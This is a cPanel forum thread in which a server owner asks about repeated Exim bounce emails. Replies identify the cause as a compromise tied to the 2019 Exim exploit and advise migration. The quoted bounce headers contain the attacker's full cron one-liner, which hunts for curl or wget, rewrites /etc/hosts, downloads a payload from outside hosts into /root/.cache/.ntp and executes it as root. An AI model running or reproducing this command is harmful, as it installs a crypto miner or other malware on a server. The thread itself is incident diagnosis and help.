Mail delivery failed: returning message to sender

slideloft · Jun 22, 2019

Hi .

I upgraded my cpanel after the Exim exploit and ever since then i have been getting emails in queue that contains the following .

Code:

--1561246082-eximdsn-632408078
Content-type: text/plain; charset=us-ascii

This message was created automatically by mail delivery software.

A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:

[email protected]
root cannot accept local mail deliveries

--1561246082-eximdsn-632408078
Content-type: message/delivery-status

Reporting-MTA: dns; server.example.com

Action: failed
Final-Recipient: rfc822;[email protected]
Status: 5.0.0

--1561246082-eximdsn-632408078
Content-type: text/rfc822-headers

Return-path: <[email protected]>
Received: from root by mega.example.com with local (Exim 4.92)
(envelope-from <[email protected]>)
id 1hepQP-00074l-Uw
for [email protected]; Sat, 22 Jun 2019 23:28:02 +0000
From: [email protected] (Cron Daemon)
To: [email protected]
Subject: Cron <[email protected]> tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <[email protected]>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; (${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.example.net/src/ldm -o /root/.cache/.ntp||${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.example.tld/src/ldm -o /root/.cache/.ntp||${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.example.org/src/ldm -o /root/.cache/.ntp||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.example.net/src/ldm -O /root/.cache/.ntp||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.example.tld/src/ldm -O /root/.cache/.ntp||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.example.org/src/ldm -O /root/.cache/.ntp) && chmod +x /root/.cache/.ntp && /bin/sh /root/.cache/.ntp
Content-Type: text/plain; charset=ANSI_X3.4-1968
Auto-Submitted: auto-generated
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=root>
X-Cron-Env: <USER=root>
Message-Id: <[email protected]>
Date: Sat, 22 Jun 2019 23:28:01 +0000
X-Exim-DSN-Information: Due to administrative limits only headers are returned


--1561246082-eximdsn-632408078--

How can i fix this . i am getting mails every 2 minute.

GOT · Jun 22, 2019

It looks to me like your hostname is not a fqdn . Go to whm and reset your hostname. This is a common problem with openvz vms which I'd bet is what you have.

Only your host can fix the issue with the changing hostname every time you boot..

Infopro · Jun 22, 2019

Checking google for just a snip of your post:

Code:

/root/.cache/.ntp) && chmod +x /root/.cache/.ntp && /bin/sh /root/.cache/

...and I found this link. Worth looking at this closer I think.
What does this entry in my server's crontab do?

In short, your server has been hacked and hackers are running a crypto miner on it. This is bad.

I've edited your post above to remove the URLs in it. They were very similar to the URLs mentioned at that link.

If you're unsure what to do here, you might want to look into hiring someone that can help you with this:
System Administration Services | cPanel Forums

cPanelLauren · Jun 24, 2019

1. the error here:

[email protected]
root cannot accept local mail deliveries

Indicates that you've not set the address for root's mail to be forwarded to in WHM>>Server Contacts>>Edit System Mail Preferences.

2. And by far the most important:

That cron output is associated with the exim compromise. If you'd like for us to investigate to identify if your server is root compromised we would be happy to. I also want to point out that there is no safe way to clean a root level compromise, if it is found that you have been affected (which I am almost certain you have) you will need to migrate. We also offer migrations for this.

If you'd like cPanel's support to assist you can open a ticket using the link in my signature. Once open please reply with the Ticket ID here so that we can update this thread with the resolution once the ticket is resolved.

Thanks!

Thread starter	Similar threads	Forum	Replies	Date
Z	Regarding the body of Mail delivery failed: returning message to sender	Email	1	Nov 30, 2020
G	Mail delivery failed: returning message to sender Error	Email	2	Jun 17, 2020
E	SSHD command will permanently erase all messages with the subject which contains "Mail delivery failed"	Email	1	Dec 17, 2019
U	Email delivery failed with PDF attachment	Email	7	Dec 16, 2019
I	Mail delivery failed: returning message to sender	Email	3	Aug 27, 2019

Search

Search

Mail delivery failed: returning message to sender

slideloft

Member

Attachments

GOT

Get Proactive!

Infopro

Well-Known Member

cPanelLauren

Product Owner